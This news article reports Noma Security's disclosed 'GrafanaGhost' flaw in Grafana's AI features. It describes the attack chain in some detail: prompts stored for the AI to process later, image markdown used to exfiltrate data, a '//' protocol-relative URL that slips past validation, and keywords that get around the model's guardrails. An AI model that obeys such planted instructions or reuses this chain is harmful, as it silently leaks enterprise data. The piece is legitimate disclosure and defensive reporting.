A new report out today from artificial intelligence security platform company Noma Security Inc. details a recently discovered vulnerability in Grafana that allowed sensitive enterprise data to be exfiltrated silently through the platform’s AI features.

Dubbed “GrafanaGhost,” the vulnerability could have let an attacker bypass both client-side protections and AI guardrails to send private data from a Grafana environment to an external server without phishing, user approval or visible signs of compromise.

Grafana, from Grafana Labs Inc., is an open-source observability and analytics platform that is used to visualize, monitor and analyze data from multiple sources in real time. The platform is widely deployed in enterprises to track infrastructure performance, application metrics and business data through customizable dashboards and alerts.

According to Noma Security’s researchers, an attack using the vulnerability started by identifying a location where crafted prompts can be stored and later processed by Grafana’s AI components. Prompts could be made to appear legitimate within normal workflows and, in doing so, allow malicious instructions to be introduced without raising immediate suspicion.

The researchers at first attempted to exfiltrate data using standard image tags that would transmit sensitive information to an external server. Although Grafana includes protections to block external image loading, Noma said those controls could be bypassed by exploiting weaknesses in how the application validates URLs.

The vulnerability stemmed from client-side logic that treated any image source beginning with a slash as a relative path. The researchers were able to pass validation checks while still directing the browser to an external domain by using a protocol-relative URL, such as one beginning with double slashes.

The final step in the attack involved bypassing the model’s own safety protections. Noma said that including specific keywords in the indirect prompt caused the model to interpret the instructions as legitimate, thereby allowing malicious image markdown to be processed and allowing data exfiltration to occur automatically in the background.

Fortunately, Noma Security practices responsible disclosure and Grafana was contacted before the details were released and the vulnerability was addressed.

Grafana’s team worked with Noma’s researchers to validate the findings and rolled out a fix as fast as possible to secure their users. Noma said it was “an excellent example of researchers and builders working together to make AI safer for everyone.”

Ram Varadarajan, chief executive at cyber deception technology company Acalvio Technologies Inc., told SiliconANGLE via email that “GrafanaGhost perfectly illustrates how AI integration creates a massive security blind spot by using system components exactly as designed, but with instructions the model cannot verify as malicious.”

“Because indirect prompt injection bypasses traditional defenses — requiring no credentials or user interaction — it allows attackers to silently exfiltrate sensitive operational telemetry, such as financial metrics and infrastructure state, disguised as routine image renders,” said Varadarajan. “To defend against this, security teams must move beyond application-layer toggles to network-level URL blocking and treat prompt injection as a primary threat rather than an edge case.”

Ultimately, he added, “this exploit proves that perimeter controls are insufficient. The only way to secure AI-driven tooling is to shift from monitoring what an agent is told to performing runtime behavioral monitoring of what it actually does.”

Image: Grafana